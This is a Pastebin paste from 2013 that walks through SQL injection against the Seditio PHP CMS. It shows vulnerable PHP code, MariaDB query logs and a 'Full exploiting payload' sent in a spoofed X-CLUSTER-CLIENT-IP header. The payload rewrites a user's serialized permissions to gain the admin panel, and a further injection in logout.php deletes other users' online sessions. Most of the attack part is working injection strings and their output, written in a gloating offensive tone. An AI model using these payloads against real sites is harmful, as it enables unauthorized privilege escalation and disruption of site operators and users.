Guest User

seditio fuck

a guest
May 21st, 2013
194
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $cfg['clustermode'] = ADMIN PANEL checkbox YES and value true :)
  2.  
  3. $usr['ip'] = ($cfg['clustermode']) ? $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'] : $_SERVER['REMOTE_ADDR'] ;
  4.  
  5. NOT VALIDATE and SANITIZE
  6.  
  7. SQL Injection :)
  8.  
  9. sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
  10.  
  11.  
  12. Authentication page (Header)
  13.  
  14. X-CLUSTER-CLIENT-IP: 127.0.0.1' or 1='1
  15.  
  16. QUERY SNIP____
  17.  
  18. MariaDB [sed]> UPDATE sed_users SET user_lastip='127.0.0.1' or 1=1 WHERE user_id=1;
  19. /*BLIND SQL*/
  20. +-------------+-----------+
  21. | user_lastip | user_name |
  22. +-------------+-----------+
  23. | 1 | admin |
  24. +-------------+-----------+
  25. 1 row in set (0.00 sec)
  26.  
  27.  
  28. MariaDB [sed]> select user_lastip,user_name from sed_users;
  29.  
  30. +-------------+-----------+
  31. | user_lastip | user_name |
  32. +-------------+-----------+
  33. | 1 | admin |
  34. +-------------+-----------+
  35. 1 row in set (0.00 sec)
  36.  
  37. second vector
  38.  
  39. MariaDB [sed]> select user_lastip,user_name from sed_users where user_id=1;
  40. +------------------+-----------+
  41. | user_lastip | user_name |
  42. +------------------+-----------+
  43. | 5.5.30-MariaDB-m | admin |
  44. +------------------+-----------+
  45. 1 row in set (0.00 sec)
  46.  
  47.  
  48. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  49. and privileges Escaltion :P
  50.  
  51.  
  52. MariaDB [sed]> select * from sed_auth where auth_code='admin';
  53. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  54. | auth_id | auth_groupid | auth_code | auth_option | auth_rights | auth_rights_lock | auth_setbyuserid |
  55. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  56. | 1 | 1 | admin | a | 0 | 255 | 1 |
  57. | 2 | 2 | admin | a | 0 | 255 | 1 |
  58. | 3 | 3 | admin | a | 0 | 255 | 1 |
  59. | 4 | 4 | admin | a | 0 | 255 | 1 |
  60. | 5 | 5 | admin | a | 255 | 255 | 1 |
  61. | 76 | 6 | admin | a | 1 | 0 | 1 |
  62. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  63.  
  64. 6 rows in set (0.01 sec) = > privileges selection
  65.  
  66.  
  67. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin';
  68. +--------------+-------------+
  69. | auth_groupid | auth_rights |
  70. +--------------+-------------+
  71. | 1 | 0 |
  72. | 2 | 0 |
  73. | 3 | 0 |
  74. | 4 | 0 |
  75. | 5 | 255 |
  76. | 6 | 1 |
  77. +--------------+-------------+
  78. 6 rows in set (0.20 sec)
  79.  
  80.  
  81. = > administrator group int(5)
  82.  
  83.  
  84. administrator rights = > 255 (admin panel keys :D)
  85.  
  86.  
  87. MariaDB [sed]> select grp_id,grp_alias from sed_groups;
  88. +--------+----------------+
  89. | grp_id | grp_alias |
  90. +--------+----------------+
  91. | 1 | guests |
  92. | 2 | inactive |
  93. | 3 | banned |
  94. | 4 | members |
  95. | 5 | administrators |
  96. | 6 | moderators |
  97. +--------+----------------+
  98. 6 rows in set (0.02 sec)
  99.  
  100.  
  101. members request output serialize() call
  102.  
  103. /*
  104. a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  105.  
  106.  
  107. members "admin";a:1:{s:1:"a";i:0;}
  108.  
  109. key (admin) value (a) = > int("0") - (member rights)
  110.  
  111.  
  112. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=4;
  113. +--------------+-------------+
  114. | auth_groupid | auth_rights |
  115. +--------------+-------------+
  116. | 4 | 0 |
  117. +--------------+-------------+
  118.  
  119. */
  120.  
  121. if (empty($row['user_auth']))
  122. {
  123. $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
  124. $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
  125. }
  126.  
  127.  
  128.  
  129. administrator request :)
  130. and output result
  131.  
  132. /* output result
  133. a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:255;}s:6:"forums";a:2:{i:1;i:255;i:2;i:255;}s:7:"gallery";a:1:{s:1:"a";i:255;}s:5:"index";a:1:{s:1:"a";i:255;}s:7:"message";a:1:{s:1:"a";i:255;}s:4:"page";a:4:{s:8:"articles";i:255;s:4:"news";i:255;s:7:"sample1";i:255;s:7:"sample2";i:255;}s:3:"pfs";a:1:{s:1:"a";i:255;}s:4:"plug";a:13:{s:7:"adminqv";i:255;s:7:"cleaner";i:255;s:7:"contact";i:255;s:14:"massmovetopics";i:255;s:4:"news";i:255;s:11:"passrecover";i:255;s:11:"recentitems";i:255;s:6:"search";i:255;s:10:"skineditor";i:255;s:10:"statistics";i:255;s:8:"syscheck";i:255;s:7:"tinymce";i:255;s:10:"whosonline";i:255;}s:2:"pm";a:1:{s:1:"a";i:255;}s:5:"polls";a:1:{s:1:"a";i:255;}s:7:"ratings";a:1:{s:1:"a";i:255;}s:5:"users";a:1:{s:1:"a";i:255;}}
  134.  
  135.  
  136.  
  137. +++++++++++++++++++++++++++++++++++
  138. admin "admin";a:1:{s:1:"a";i:255;}
  139.  
  140. key (admin) value (a) = > int("0") - (member rights)
  141.  
  142. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=5;
  143. +--------------+-------------+
  144. | auth_groupid | auth_rights |
  145. +--------------+-------------+
  146. | 5 | 255 |
  147. +--------------+-------------+
  148.  
  149.  
  150. */
  151.  
  152.  
  153. =========================================================
  154.  
  155. function sed_auth_build($userid, $maingrp=0)
  156. {
  157. global $db_auth, $db_groups_users;
  158.  
  159. $groups = array();
  160. $authgrid = array();
  161. $tmpgrid = array();
  162.  
  163. if ($userid==0 || $maingrp==0)
  164. {
  165. $groups[] = 1;
  166. }
  167. else
  168. {
  169. $groups[] = $maingrp;
  170. $sql = sed_sql_query("SELECT gru_groupid FROM $db_groups_users WHERE gru_userid='$userid'");
  171.  
  172. while ($row = sed_sql_fetchassoc($sql))
  173. { $groups[] = $row['gru_groupid']; }
  174. }
  175.  
  176. $sql_groups = implode(',', $groups);
  177. $sql = sed_sql_query("SELECT auth_code, auth_option, auth_rights FROM $db_auth WHERE auth_groupid IN (".$sql_groups.") ORDER BY auth_code ASC, auth_option ASC");
  178.  
  179. while ($row = sed_sql_fetchassoc($sql))
  180. { $authgrid[$row['auth_code']][$row['auth_option']] |= $row['auth_rights']; }
  181.  
  182. return($authgrid); }
  183.  
  184. //update priviliges
  185.  
  186.  
  187. $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  188.  
  189.  
  190. Evaluation of the rights admin.
  191.  
  192. $di=unserialize($usr['auth']);
  193. echo $di['admin']['a']; //output 255 :) then the verification :P
  194.  
  195.  
  196. Priviliges escaltion exploitation
  197.  
  198. problem banlist section :)
  199.  
  200. $usr['ip']="127.0.0.1'or 1=1--";
  201. $userip = explode('.', $usr['ip']);
  202. $ipmasks = "('".$userip[0].".".$userip[1].".".$userip[2].".".$userip[3]."','".$userip[0].".".$userip[1].".".$userip[2].".*','".$userip[0].".".$userip[1].".*.*','".$userip[0].".*.*.*')";
  203. var_dump($userip);
  204.  
  205. IPv4#Addressing 127.0.0.1'or 1=1--
  206.  
  207. echo $usrip[3]; //output result
  208.  
  209. IN(127.0.0.1') or usr_auth='blah'-- -)
  210. nooo syntax :)
  211.  
  212. second query (Update statement)
  213.  
  214. 130516 21:25:52 66 Query UPDATE sed_users SET user_lastlog='1368721491', user_lastip='12.3.44.4.4') or usr_auth='blah' -- -
  215.  
  216. true syntax? = nono :)
  217.  
  218.  
  219. 4 th key :)
  220.  
  221. $usr['ip']="127.0.0.1.4'or 1=1-- -";
  222. var_dump($usr['ip']); //output 4'or 1=1-- -
  223.  
  224. 4 th key not used
  225.  
  226. me login: administrator
  227. MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G
  228. *************************** 1. row ***************************
  229. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  230. 1 row in set (0.44 sec)
  231.  
  232. (admin) key (a) value => "0" no perm :D
  233. change perm via sql injection (Priviliges escaltion)
  234.  
  235. No Cookie option
  236.  
  237. if ($cfg['authmode']==2 || $cfg['authmode']==3)
  238. { session_start(); }
  239.  
  240. if (isset($_SESSION['rsedition']) && ($cfg['authmode']==2 || $cfg['authmode']==3))
  241. {
  242. $rsedition = $_SESSION['rsedition'];
  243. $rseditiop = $_SESSION['rseditiop'];
  244. $rseditios = $_SESSION['rseditios'];
  245. }
  246. elseif (isset($_COOKIE['SEDITIO']) && ($cfg['authmode']==1 || $cfg['authmode']==3))
  247. {
  248. $u = base64_decode($_COOKIE['SEDITIO']);
  249. $u = explode(':_:',$u);
  250. $rsedition = sed_import($u[0],'D','INT');
  251. $rseditiop = sed_import($u[1],'D','H32');
  252. $rseditios = sed_import($u[2],'D','ALP');
  253. }
  254.  
  255. if ($rsedition>0 && $cfg['authmode']>0)
  256. {
  257. if (mb_strlen($rseditiop)!=32)
  258. { sed_diefatal('Wrong value for the password.'); }
  259.  
  260. if ($cfg['ipcheck'])
  261. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  262. else
  263. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  264.  
  265. if ($row = sed_sql_fetcharray($sql))
  266. {
  267. if ($row['user_maingrp']>3)
  268. {
  269. $usr['id'] = $row['user_id'];
  270. $usr['sessionid'] = ($cfg['authmode']==1) ? md5($row['user_lastvisit']) : session_id();
  271. $usr['name'] = $row['user_name'];
  272. $usr['maingrp'] = $row['user_maingrp'];
  273. $usr['lastvisit'] = $row['user_lastvisit'];
  274. $usr['lastlog'] = $row['user_lastlog'];
  275. $usr['timezone'] = $row['user_timezone'];
  276. $usr['skin'] = ($cfg['forcedefaultskin']) ? $cfg['defaultskin'] : $row['user_skin'];
  277. $usr['lang'] = ($cfg['forcedefaultlang']) ? $cfg['defaultlang'] : $row['user_lang'];
  278. $usr['newpm'] = $row['user_newpm'];
  279. $usr['auth'] = unserialize($row['user_auth']);
  280. $usr['level'] = $sed_groups[$usr['maingrp']]['level'];
  281. $usr['profile'] = $row;
  282.  
  283. if ($usr['lastlog']+$cfg['timedout'] < $sys['now_offset'])
  284. {
  285. $sys['comingback']= TRUE;
  286. $usr['lastvisit'] = $usr['lastlog'];
  287. $sys['sql_update_lastvisit'] = ", user_lastvisit='".$usr['lastvisit']."'";
  288. }
  289.  
  290. if (empty($row['user_auth']))
  291. {
  292. $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
  293. $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
  294. }
  295.  
  296. // $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  297. }
  298. }
  299. }
  300.  
  301.  
  302. Cookie header send
  303.  
  304. Cookie: PHPSESSID=blablablasessionidrseditionandauthmode
  305.  
  306. if true :/ (if ($rsedition>0 && $cfg['authmode']>0));
  307.  
  308. if ($rsedition>0 && $cfg['authmode']>0)
  309. {
  310. if (mb_strlen($rseditiop)!=32)
  311. { sed_diefatal('Wrong value for the password.'); }
  312.  
  313. if ($cfg['ipcheck'])
  314. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  315. else
  316. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  317.  
  318.  
  319. file: config.php
  320. section: $cfg['ipcheck']=true;
  321.  
  322. fail syntax
  323.  
  324. $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'");
  325.  
  326. my vector and fail syntax
  327.  
  328. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  329.  
  330.  
  331. full snip query
  332.  
  333. +++++++++++++++++++++++++++++++++++++
  334. SELECT * FROM $db_users WHERE user_id='3 AND user_password='blah' AND user_lastip='127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -'
  335.  
  336. Failure syntax :(
  337.  
  338. LOGIN PAGE REQUEST (HTTP HEADER)
  339. X-CLUSTER-CLIENT-IP: 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  340.  
  341. http://s18.postimg.org/xcjy55mkp/fullquery.png
  342.  
  343.  
  344. return false if the cookie option is empty
  345.  
  346. /*
  347. if ($rsedition>0 && $cfg['authmode']>0) // output result false :) (no cookie option)
  348. */
  349.  
  350.  
  351. after the introduction mysql query log :)
  352.  
  353. 326 Query SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM sed_users WHERE user_password='3e1f0522ece29f7be6f69cd3bfb2d9a8' AND user_name='admin'
  354. 326 Query UPDATE sed_users SET user_lastip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' WHERE user_id='1' LIMIT 1
  355. 326 Query DELETE FROM sed_online WHERE online_userid='-1' AND online_ip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' LIMIT 1
  356. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  357.  
  358. AFTER
  359.  
  360. Full exploiting payload
  361.  
  362. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  363.  
  364. MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G*************************** 1. row ***************************
  365. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  366. 1 row in set (0.00 sec)
  367.  
  368. "admin";a:1:{s:1:"a";i:255;}
  369.  
  370. value = > "255" WTF ? :D ??
  371.  
  372. ADMIN PANEL :D
  373.  
  374. http://s22.postimg.org/whujo6xu9/lol.png
  375.  
  376.  
  377. ==============================================================
  378.  
  379. Unauthorized user *logout*
  380.  
  381. MariaDB [sed]> select online_ip,online_name from sed_online;
  382. +-----------+-------------+
  383. | online_ip | online_name |
  384. +-----------+-------------+
  385. | 127.0.0.1 | admin |
  386. | 128.0.0.2 | user |
  387. +-----------+-------------+
  388. 2 row in set (0.00 sec)
  389.  
  390. me login => user :)
  391.  
  392. Logout page request (HEADER) = > logout.php
  393.  
  394. X-CLUSTER-CLIENT-IP: 127.0.0.1
  395.  
  396. if ($usr['id']>0)
  397. {
  398. $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='".$usr['ip']."'");
  399. sed_redirect("message.php?msg=".$usr['ip']);
  400. exit;
  401. }
  402.  
  403. echo $usr['ip'] => Output 127.0.0.1222233' or online_name='admin' (Spoof X IP)-(Administrator IP :D) :)
  404.  
  405. QUERY EXEC - > $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='127.0.0.1222233' or online_name='admin'");
  406.  
  407. ???? profit = administrator panic :D
  408.  
  409.  
  410. my favorit :) http://www.youtube.com/watch?v=ruFt9ZvBnvo
RAW Paste Data